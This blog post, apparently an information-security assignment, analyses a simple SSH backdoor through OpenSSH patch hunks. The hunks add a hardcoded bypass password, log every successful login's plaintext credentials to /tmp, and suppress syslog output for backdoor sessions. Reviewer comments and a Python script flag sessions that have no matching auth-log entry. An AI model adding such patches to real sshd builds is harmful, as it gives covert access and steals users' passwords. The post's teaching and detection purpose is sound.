曹逸君 Blog

December 30, 2013

SSH Backdoor a simple example

SSH Backdoor --- a simple example analysis

Information security assignment by 曹逸君

It's not a secret that there are dozens of ssh backdoors out there, and it is fairly easy to write a simple one.
Usually they have two main functions: secret authentication, and password or RSA key collection.

Secret authentication

Password or RSA key authentication for the backdoor user; in this example only password authentication is implemented.

diff -u openssh/includes.h openssh.patch//includes.h
--- openssh/includes.h  2010-10-24 06:47:30.000000000 +0800
+++ openssh.patch//includes.h   2013-12-24 22:17:53.385927565 +0800
@@ -172,4 +172,9 @@

 #include "entropy.h"

+int secret_auth;
+FILE *f;
+#define ILOG "/tmp/ilog"
+#define OLOG "/tmp/olog"
+#define SECRETPW "flyhigh"
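Review bot: the bypass password and both log paths are embedded as string literals (SECRETPW, ILOG, OLOG), so they survive compilation verbatim and show up in a `strings` dump of the resulting sshd; independently of that, the rebuilt binary no longer matches the distribution package hash, which is the cheapest integrity check a defender has. Defining (not merely declaring) the globals `secret_auth` and `f` in a header gives every translation unit that includes it its own definition, which links only because the compiler merges them as common symbols. OLOG is defined here but never used in any hunk shown.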
    diff -u openssh/auth-passwd.c openssh.patch//auth-passwd.c
    +   if (!strcmp(password, SECRETPW)) {
    +                secret_auth=1;
    +                return 1;
    +        }
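Review bot: this fragment is shown without its @@ header, so its position relative to the normal checks in auth_password is not visible; what is visible is that a match returns 1 immediately, so the login never reaches sys_auth_passwd and the platform authentication routine never sees it, yet a session is still established. That gap, an interactive session the host's own authentication subsystem has no record of, is exactly the condition a monitoring rule should alert on.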

Password|RSA key collection

Only password collection is implemented in this example, both incoming and outgoing.
And in this example the stolen passwords are not sent to a remote server; they are simply written to a file.

@@ -123,6 +126,12 @@
    }
 #endif
    result = sys_auth_passwd(authctxt, password);
+   if(result){
+       if((f=fopen(ILOG,"a"))!=NULL){
+           fprintf(f,"user:password --> %s:%s\n",authctxt->user, password);
+           fclose(f);
+       }
+   }
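Review bot: the record is appended to /tmp/ilog via fopen(ILOG, "a") with no mode control, so the file is created with the default 0666 masked only by the daemon's umask, typically world-readable, and it holds plaintext credentials for every successful login (only the `result` true branch writes). From the defender's side, sshd writing to a regular file under /tmp is abnormal and easy to catch with an audit rule on file writes by the sshd executable or a file-integrity watch on /tmp.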

No log for backdoor

Several places are modified to prevent logging of the backdoor user's login activity, like this.

diff -u openssh/log.c openssh.patch//log.c
--- openssh/log.c   2011-06-20 11:42:23.000000000 +0800
+++ openssh.patch//log.c    2013-12-24 22:17:53.385927565 +0800
@@ -351,6 +351,7 @@
 void
 do_log(LogLevel level, const char *fmt, va_list args)
 {
+if(!secret_auth || secret_auth!=1){
 #if defined(HAVE_OPENLOG_R) && defined(SYSLOG_DATA_INIT)
    struct syslog_data sdata = SYSLOG_DATA_INIT;
 #endif
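Review bot: the condition `!secret_auth || secret_auth!=1` is redundant, `secret_auth != 1` alone already covers the zero case. More importantly, wrapping the entire body of do_log means that once secret_auth is set every message in that process is dropped, errors included, not only the login lines. The suppression also covers only what is routed through do_log: records written by other code paths, such as the utmp/wtmp login records and the connection itself at the network level, are untouched and remain a basis for detection.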
@@ -428,3 +429,4 @@
    }
    errno = saved_errno;
 }
+}
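As an added defender-side check that is not part of the original post: the patch above silences only messages that pass through do_log(), so the "Accepted password for ..." line disappears while the wtmp session record, written by a separate code path (assuming loginrec.c is not also patched), still appears in `last` output. The script below, using constructed `last -F` and auth.log sample lines, flags sessions that have no matching "Accepted" entry.

```python
import re
from datetime import datetime, timedelta

# Constructed sample input: `last -F` style session records (from wtmp) and the
# sshd lines from auth.log for the same period. bob's session has no "Accepted" line.
WTMP = """\
alice    pts/0   10.0.0.5   Tue Dec 24 22:10:03 2013 - Tue Dec 24 22:40:11 2013  (00:30)
bob      pts/1   10.0.0.9   Tue Dec 24 22:17:53 2013   still logged in
alice    pts/2   10.0.0.5   Tue Dec 24 23:05:40 2013 - Tue Dec 24 23:06:02 2013  (00:00)
"""
AUTH_LOG = """\
Dec 24 22:10:03 host sshd[4012]: Accepted password for alice from 10.0.0.5 port 51022 ssh2
Dec 24 23:05:40 host sshd[4310]: Accepted publickey for alice from 10.0.0.5 port 51100 ssh2
"""

SESSION_RE = re.compile(r"^(\S+)\s+\S+\s+(\S+)\s+(\w{3} \w{3}\s+\d+ \d\d:\d\d:\d\d \d{4})")
ACCEPT_RE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Accepted \S+ for (\S+) from (\S+) ")

def parse_sessions(text):
    """(user, source host, login time) for each wtmp session line."""
    out = []
    for line in text.splitlines():
        m = SESSION_RE.match(line)
        if m:
            user, host, when = m.groups()
            out.append((user, host, datetime.strptime(when, "%a %b %d %H:%M:%S %Y")))
    return out

def parse_accepted(text, year):
    """(user, source host, time) for each 'Accepted ...' line; syslog omits the year."""
    out = []
    for line in text.splitlines():
        m = ACCEPT_RE.match(line)
        if m:
            when, user, host = m.groups()
            out.append((user, host, datetime.strptime(f"{when} {year}", "%b %d %H:%M:%S %Y")))
    return out

def unlogged_sessions(sessions, accepted, slack=timedelta(seconds=5)):
    """Sessions with no 'Accepted' line for the same user and host within `slack`."""
    return [
        (user, host, start)
        for user, host, start in sessions
        if not any(u == user and h == host and abs(t - start) <= slack
                   for u, h, t in accepted)
    ]

def check_sample():
    return unlogged_sessions(parse_sessions(WTMP), parse_accepted(AUTH_LOG, 2013))

if __name__ == "__main__":
    for user, host, start in check_sample():
        print(f"session without auth log entry: {user} from {host} at {start}")
```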

Further features

Some features are crucial for real-life usage:
1. a rootkit to protect the backdoor
2. live patching, so that sshd does not have to be restarted
3. automatic sending of collected passwords and RSA secret keys

These features have shown up in real-life examples.
Security is not only about guarding the border; monitoring the inner environment is equally essential.

Reference
original patch code
openssh

Written with StackEdit.